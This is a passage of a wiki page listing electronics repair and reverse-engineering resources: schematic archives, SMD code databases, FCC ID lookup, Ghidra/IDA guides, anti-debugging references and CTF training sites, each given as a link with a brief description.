::[https://www.gadget-manual.com/nvidia-geforce/ Gadget-Manual] - Graphic card manuals boardviews and datasheets.&lt;br /&gt;
&lt;br /&gt;
::[https://sector.biz.ua/docs/schematic_diagrams_msi_motherboards/schematic_diagrams_msi_motherboards.phtml Sector] - Russian website offering schemetic diagrams, datasheets and boardviews (Asrock, Asus, ECS, Gigabyte, Acer, IBM/Lenovo).&lt;br /&gt;
&lt;br /&gt;
::[https://schematic-x.blogspot.com/ Schematic-x] - Free laptops &amp;amp; desktop schematic diagrams and BIOS downloads.&lt;br /&gt;
&lt;br /&gt;
::[https://www.s-manuals.com/notebook S-manuals.com] - Notebooks, Schematics, Service Manuals, ..&lt;br /&gt;
&lt;br /&gt;
=====Laptop or smartphone Boardview / Schematic / Firmware [Groups]=====&lt;br /&gt;
::[https://t.me/schematicslaptop schematicslaptop] - Laptop schematics.&lt;br /&gt;
&lt;br /&gt;
::[https://t.me/biosarchive biosarchive] - The largest channel of archived bios (firmwares) of laptops.&lt;br /&gt;
&lt;br /&gt;
::[https://t.me/SMART_PHONE_SCHEMATICS SMART_PHONE_SCHEMATICS] - Colection of smartphone schematics.&lt;br /&gt;
&lt;br /&gt;
=====Software for opening Boardview files=====&lt;br /&gt;
&lt;br /&gt;
::[[Software_Tools#Tools_for_opening_CAD_or_Boardview_files|Tools for opening CAD or Boardview files.]]&lt;br /&gt;
&lt;br /&gt;
====Retro PC Hardware====&lt;br /&gt;
::[https://theretroweb.com/ The Retro Web] - The Retro Web motherboard database, here you can find board photos, BIOS images, manuals and more!&lt;br /&gt;
&lt;br /&gt;
::[https://soggi.org/ Soggi] - Retro hardware BIOS, firmware, drivers, manual, patches, tools, utilities, tech demos, other downloads and specifications available.&lt;br /&gt;
&lt;br /&gt;
====Vintage Audio Equipment Schematics / Manuals====&lt;br /&gt;
::[https://hifigoteborg.se/pdf/ HiFiGoteborg] - LoudAndProud HiFi Goteborg. Schematic archive of old forgotten Hi-Fi from the golden days.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
===SMD Marking Codes Database===&lt;br /&gt;
&lt;br /&gt;
'''Due to the small size of most SMD components, manufacturers are not able to write the full part number on the case. They use instead a marking code typically composed of a combination of 2 or 3 letters or digits.'''&amp;lt;br&amp;gt;&lt;br /&gt;
'''When repairing an unknown electronic board, it becomes so difficult to know what is the exact type of a given component. This database allows to quickly find the part number of a SMD component when you have only the marking code.'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
::[https://www.pcbcart.com/article/content/How-to-Identify-SMD-Components.html PCBCart] - How to Identify SMD Components Explained.&lt;br /&gt;
&lt;br /&gt;
::[https://smd.yooneed.one/ smd.yooneed.one] - A searchable database of electronics SMD components marking codes.&lt;br /&gt;
&lt;br /&gt;
::[https://embedeo.org/smd_codes/ embedeo.org/smd_codes] - SMD marking codes of electronic components such as bipolar transistors (BJT), field effect transistors (FET, MOSFET, JFET), diodes, Zener diodes, Schottky ..&lt;br /&gt;
&lt;br /&gt;
::[https://repaircompanion.com/ RepairCompanion] - Your companion for electronics tools, component identification, calculators, diagnostics and education.&lt;br /&gt;
&lt;br /&gt;
::[https://www.sos.sk/pdf/SMD_Catalog.pdf SOS electronic, The SMD CODEBOOK] - It lists well over 3,400 device codes in alphabetical order, together with type numbers, device characteristics or equivalents and pinout information.&lt;br /&gt;
&lt;br /&gt;
::[http://www.marsport.org.uk/smd/mainframe.htm The SMD Codebook (marsport)] - Online version to look up a SMD codes.&lt;br /&gt;
&lt;br /&gt;
::[https://www.s-manuals.com/smd S-manuals.com] - SMD Markings, SMD codes, ..&lt;br /&gt;
&lt;br /&gt;
===IC Equivlent Database===&lt;br /&gt;
&lt;br /&gt;
'''This might be useful if you run into a problem were you don't have a exact matching replacement part. Now you can use the cross reference search for an equivalent IC.'''&lt;br /&gt;
&lt;br /&gt;
::[https://alltransistors.com/ All Transistors] - Datasheet. Cross Reference Search. Transistor Database.&lt;br /&gt;
&lt;br /&gt;
::[https://octopart.com/ Octopart] - Lets you search for transistor datasheets but also allows you to filter by key specifications much like AllTransistors cross reference.&lt;br /&gt;
&lt;br /&gt;
===Hardware pinouts (web-based)===&lt;br /&gt;
&lt;br /&gt;
::[https://allpinouts.org/ allpinouts.org] - is a Web-based free content project to list cable and connectors pin-outs.&lt;br /&gt;
&lt;br /&gt;
::[https://pinouts.ru/ pinouts.ru] - Handbook of hardware schemes, cables and connectors layouts pinouts.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
===Find a image of the PCB without opening the device===&lt;br /&gt;
:# Modify the link below replace &amp;quot;example&amp;quot; without quotes with the product name and model you want to find&lt;br /&gt;
:# Visit the url and the results will show, if it does not show any results it has not been listed in the fccid database.&lt;br /&gt;
::&amp;lt;pre&amp;gt;https://www.google.com/search?tbm=isch&amp;amp;q=example+internal+site:fccid.io&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
::Note that there will be no results if the device does not have a wireless receiver or transmitter inside.&amp;lt;br&amp;gt; Some have used a off-the-shelf (OTS) wireless radio to avoid having to do a new FCC certification. In that case it is useless material and time saving to first quickly image search the ID to check for this.&lt;br /&gt;
::[https://fccid.io/search.php FCCID.io search direct link]&lt;br /&gt;
&lt;br /&gt;
====Electronic certification databases====&lt;br /&gt;
'''If the device is sold in the U.S. and complies with U.S. regulations, see below.'''&amp;lt;br&amp;gt;&lt;br /&gt;
An FCC ID is a unique identifier assigned to a device registered with the United States Federal Communications Commission.&amp;lt;br&amp;gt;&lt;br /&gt;
For legal sale of wireless devices in the US.&lt;br /&gt;
These databases can be of great use if you want to quickly know what kind of wireless communication hardware is used.&amp;lt;br&amp;gt;&lt;br /&gt;
Here you can most often find certifications, type approvals, specifications, instructions, internal/external pictures and sometimes even datasheets.&lt;br /&gt;
&lt;br /&gt;
::* FCC.Report. Provides this easily searchable FCC ID database.&lt;br /&gt;
:::: [https://fcc.report/FCC-ID/ -&amp;gt; FCC.Report]&lt;br /&gt;
::* Device.report. Electronics device database of over 500,000 products with certifications, type approvals, specifications, instructions, and datasheets. &lt;br /&gt;
:::: [https://device.report/ -&amp;gt; Device.Report]&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
===Digital Education===&lt;br /&gt;
:Resources for reverse engineering closed-source software to identify bugs, debug, and conduct penetration testing.&lt;br /&gt;
&lt;br /&gt;
====Reverse Engineering Guides====&lt;br /&gt;
:Tools are great, and sometimes free! Without knowing how to use them, they can be a big waste of time. Better to spend your time learning the basics, then apply your knowledge. &lt;br /&gt;
&lt;br /&gt;
::[http://security.cs.rpi.edu/courses/hwre-spring2014/ CSCI 4974 / 6974 Hardware Reverse Engineering] - Good slide decks on reverse engineering hardware at all levels, IC to PCB.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/mytechnotalent/Reverse-Engineering-Tutorial Reverse Engineering Tutorial] - A comprehensive reverse engineering tutorial covering x86, x64, 32-bit ARM &amp;amp; 64-bit ARM architectures.&lt;br /&gt;
&lt;br /&gt;
=====Ghidra Documents=====&lt;br /&gt;
'''Class material linked from ghidra.re. Use &amp;lt;u&amp;gt;arrow keys on keyboard&amp;lt;/u&amp;gt; to move through slides.'''&lt;br /&gt;
======Beginner======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Beginner/Introduction_to_Ghidra_Student_Guide.html Introduction to Ghidra Student Guide.]&lt;br /&gt;
======Intermediate======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Intermediate/Intermediate_Ghidra_Student_Guide.html Intermediate to Ghidra Student Guide.]&lt;br /&gt;
======Advanced (PDF)======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Advanced/improvingDisassemblyAndDecompilation.pdf Advanced (PDF).]&lt;br /&gt;
======Advanced Development======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/AdvancedDevelopment/GhidraAdvancedDevelopment.html Advanced Development.]&lt;br /&gt;
======Debugger======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Debugger/README.html Debugger.]&lt;br /&gt;
======BSim======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/BSim/README.html BSim.]&lt;br /&gt;
&lt;br /&gt;
=====IDA Material=====&lt;br /&gt;
&lt;br /&gt;
::[[File:Reverse Engineering Malware IDA &amp;amp; Olly Basics 5 parts by otw v1.pdf|thumb]] - A Reverse Engineering Malware introduction and bare basics IDA &amp;amp; Olly x86 (5 parts) by otw.&lt;br /&gt;
&lt;br /&gt;
::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-1/ Using IDAPython to Make Your Life Easier: Part 1] - As a malware reverse engineer, I often find myself using IDA Pro in my day-to-day activities. It should come as no surprise, seeing as IDA Pro is the industry standard (although alternatives such as radare2 and Hopper are gaining traction). One of the more powerful features of IDA that I implore all reverse engineers to make use of is the Python addition, aptly named ‘IDAPython’, which exposes a large number of IDA API calls.&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-2/ Using IDAPython to Make Your Life Easier: Part 2]&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-3/ Using IDAPython to Make Your Life Easier: Part 3]&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-4/ Using IDAPython to Make Your Life Easier: Part 4]&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-5/ Using IDAPython to Make Your Life Easier: Part 5]&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering Some publicly available Malware analysis and Reverse engineering] - is a curated list of awesome materials from the user Dump-GUY a former Forensic, Malware Analyst, Reverse Engineer. [https://www.youtube.com/c/DuMpGuYTrIcKsTeR Youtube channel].&lt;br /&gt;
&lt;br /&gt;
=====x64dbg=====&lt;br /&gt;
&lt;br /&gt;
::[https://help.x64dbg.com/en/latest/introduction/index.html x64dbg] - Introduction &amp;amp; documentation page.&lt;br /&gt;
&lt;br /&gt;
=====Immunity Debugger=====&lt;br /&gt;
&lt;br /&gt;
::[https://class.malware.re/stuff/nardella/basic-reverse-engineering-immunity-debugger-36982.pdf Basic Reverse Engineering with Immunity Debugger] - SANS Institute Information Security Reading Room. Basic Reverse Engineering x86 with Immunity Debugger.&lt;br /&gt;
&lt;br /&gt;
=====Malware Reverse Engineering=====&lt;br /&gt;
&lt;br /&gt;
::[https://tryhackme.com/room/basicmalwarere BasicMalwareRE] - this room aims towards helping everyone learn about the basics of &amp;quot;Malware Reverse Engineering&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
::[https://gist.github.com/IdanBanani/5be0442ad390f89259b494098f450bfd Reversing / Malware Analysis / Assembly -resources] - is a large list of reversing materials and courses.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/CyberSecurityUP/Awesome-Malware-and-Reverse-Engineering Malware and Reverse Engineering Complete Collection] - Awesome Malware and Reverse Engineering collection by Joas.&lt;br /&gt;
&lt;br /&gt;
=====Anti Debugging Protection Techniques with Examples=====&lt;br /&gt;
======x86 (Win32)======&lt;br /&gt;
&lt;br /&gt;
::[https://anti-debug.checkpoint.com/ cp&amp;lt;r&amp;gt; Anti-Debug Tricks] - By Check Point Research: CPR, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[https://www.codeproject.com/Articles/30815/An-Anti-Reverse-Engineering-Guide An-Anti-Reverse-Engineering-Guide] - By Joshua Tully hosted on CodeProject, Win32/x86 with examples.&lt;br /&gt;
&lt;br /&gt;
::[https://www.openrce.org/reference_library/anti_reversing OpenRCE Anti Reversing Database] - Mostly if not all Win32/x86. The Anti Reverse Engineering Database provides the analysis and desription for a number of various anti debugging, disassembly and dumping tricks. This resource aims to help reverse engineers locate, identify and bypass such techniques.&lt;br /&gt;
&lt;br /&gt;
::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.&lt;br /&gt;
&lt;br /&gt;
::[[Media:Anti-reverse engineering techniques by Jozef Miljak.pdf]] - An experimental study on which anti-reverse engineering technique are the most effective to protect your software from reversers, Win32/x86.&lt;br /&gt;
&lt;br /&gt;
::[https://forum.tuts4you.com/files/file/1218-anti-reverse-engineering-guide/ Anti-Reverse Engineering Guide By Teddy Rogers] - An individual reading this should have a solid understanding of ASM, how computers handle memory, the Win32 Debugging API, and at least some knowledge of Windows internals. &lt;br /&gt;
&lt;br /&gt;
======x64 (Win64)======&lt;br /&gt;
&lt;br /&gt;
::[https://anti-debug.checkpoint.com/ cp&amp;lt;r&amp;gt; Anti-Debug Tricks] - By Check Point Research: CPR, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.&lt;br /&gt;
&lt;br /&gt;
====Machine code or virtual machine bytecode reference==== &lt;br /&gt;
&lt;br /&gt;
=====Assembly reference / manuals=====&lt;br /&gt;
&lt;br /&gt;
======x86======&lt;br /&gt;
&lt;br /&gt;
::[http://ref.x86asm.net/ Reference x86] - Reference X86 Opcode and Instructions (the holy x86 assembly bible).&lt;br /&gt;
&lt;br /&gt;
======x86 Training======&lt;br /&gt;
::[https://x86re.com/1.html Reverse Engineering for Noobs Part 1] - Brief introduction to RE, executables, compiling, 32-bit x86 syntax, and stack frames.&lt;br /&gt;
&lt;br /&gt;
::[https://x86re.com/2.html Reverse Engineering for Noobs Part 2: Portable Executable Files] - Breakdown of Portable Executable image file headers and sections.&lt;br /&gt;
&lt;br /&gt;
======x86 and amd64======&lt;br /&gt;
&lt;br /&gt;
::[https://www.felixcloutier.com/x86/ x86 and amd64 instruction reference] - Derived from the December 2023 version of the Intel® 64 and IA-32 Architectures Software Developer's Manual.&lt;br /&gt;
&lt;br /&gt;
=====Bytecode reference=====&lt;br /&gt;
======Java Virtual Machine (JVM)======&lt;br /&gt;
&lt;br /&gt;
::[https://en.wikipedia.org/wiki/List_of_Java_bytecode_instructions Wikipedia] - List of Java bytecode instructions.&lt;br /&gt;
&lt;br /&gt;
::[https://javaalmanac.io/bytecode/ The Java Version Almanac] - Java Bytecode, by Mnemonic.&lt;br /&gt;
&lt;br /&gt;
======Dalvik opcodes (Android)======&lt;br /&gt;
&lt;br /&gt;
::[http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html Pallergabor] - Dalvik opcodes documentation with examples.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/user1342/Awesome-Android-Reverse-Engineering Awesome-Android-Reverse-Engineering] - A curated list of awesome Android Reverse Engineering training, resources, and tools.&lt;br /&gt;
&lt;br /&gt;
======Common Language Runtime (CLR) .NET======&lt;br /&gt;
&lt;br /&gt;
::[https://en.wikipedia.org/wiki/List_of_CIL_instructions Wikipedia] - List of CIL instructions.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/stakx/ecma-335/blob/master/docs/TABLE_OF_CONTENTS.md ECMA-335 Documentation] - This Standard defines the Common Language Infrastructure (CLI).&lt;br /&gt;
&lt;br /&gt;
====Reverse Engineering Challenges====&lt;br /&gt;
&lt;br /&gt;
::[https://crackmes.one/ Crackmes.one] - is a simple place where you can download crackmes to improve your reverse engineering skills.&lt;br /&gt;
&lt;br /&gt;
::[https://crackmy.app/ CrackMy.App] - is as place to share your crackmes, solve challenges, and climb the leaderboard in the ultimate reverse engineering community.&lt;br /&gt;
&lt;br /&gt;
====Security Training Classes====&lt;br /&gt;
&lt;br /&gt;
::[https://ost2.fyi/ OpenSecurityTraining2] - is a free, beta-stage online platform built on Open edX that offers in-depth cybersecurity and reverse-engineering courses like x86 assembly, kernel exploitation, and firmware analysis.&lt;br /&gt;
&lt;br /&gt;
====Security CTF====&lt;br /&gt;
Capture the Flag (CTF) in computer security is an exercise in which participants attempt to find text strings, called &amp;quot;flags&amp;quot;, which are secretly hidden in purposefully vulnerable programs or websites.&amp;lt;br&amp;gt;&lt;br /&gt;
Learn more about reverse engineering and cybersecurity start playing CTF's.&lt;br /&gt;
&lt;br /&gt;
::[https://jaimelightfoot.com/blog/so-you-want-to-ctf-a-beginners-guide/ CTF Beginners Guide] - is intended to be a guide for beginners who have just started playing CTFs (or for people who have never played, but would like to).&lt;br /&gt;
&lt;br /&gt;
::[https://ctflearn.com/ CTFlearn] - The most beginner-friendly way to get into hacking. Challenges Test your skills by hacking your way through hundreds of challenges.&lt;br /&gt;
&lt;br /&gt;
::[https://ctf101.org/ CTF101] - a site documenting the basics of playing Capture the Flags. This guide was written and maintained by the OSIRIS Lab at New York University.&lt;br /&gt;
&lt;br /&gt;
::[https://picoctf.org/ picoCTF] - is a free computer security education program with original content built on a capture-the-flag framework created by security and privacy experts.&lt;br /&gt;
&lt;br /&gt;
::[https://microcorruption.com/ MicroCorruption] - is a online, embedded debugger that starts from scratch and introduces the very foundations of memory corruption. Great practice for learning the basics of binary exploitation.&lt;br /&gt;
&lt;br /&gt;
::[https://echoctf.red/ echoctf.red] - A platform to develop, run and administer CTF competitions. The online echoCTF.RED platform user interfaces and codebase.&lt;br /&gt;
&lt;br /&gt;
::[https://pwnable.kr/ Wargames Pwnable.kr] - is a non-commercial wargame site which provides various pwn challenges regarding system exploitation, including reverse engineering, web exploitation, and cryptography.&lt;br /&gt;
&lt;br /&gt;
::[https://pwnable.tw/challenge/ Wargames Pwnable.tw] - is a wargame site for hackers to test and expand their binary exploiting skills. HOW-TO. Try to find out the vulnerabilities exists.&lt;br /&gt;
&lt;br /&gt;
::[https://ctfsites.github.io/ More CTF sites] - A curated list of more CTF sites on Github.&lt;br /&gt;
&lt;br /&gt;
====Embedded security Challenge (ESC)====&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2024 csaw_esc_2024] - CSAW 2024 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2023 csaw_esc_2023] - CSAW 2023 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2022 csaw_esc_2022] - CSAW 2022 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2021 csaw_esc_2021] - CSAW 2021 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2019 csaw_esc_2019] - CSAW 2019 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
====800 MHz AMPS Documentation====&lt;br /&gt;
::[https://wiki.recessim.com/w/images/8/86/Cellular_Telephone_Bible_With_SIDs.txt The Cellular Telephone Bible by Mike Larsen (1997)] Unlock codes and programming procedures of early 800 MHz analog AMPS cellular phones. This document also contains the system IDs (SID) of the 800 MHz analog service providers.&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
</feed>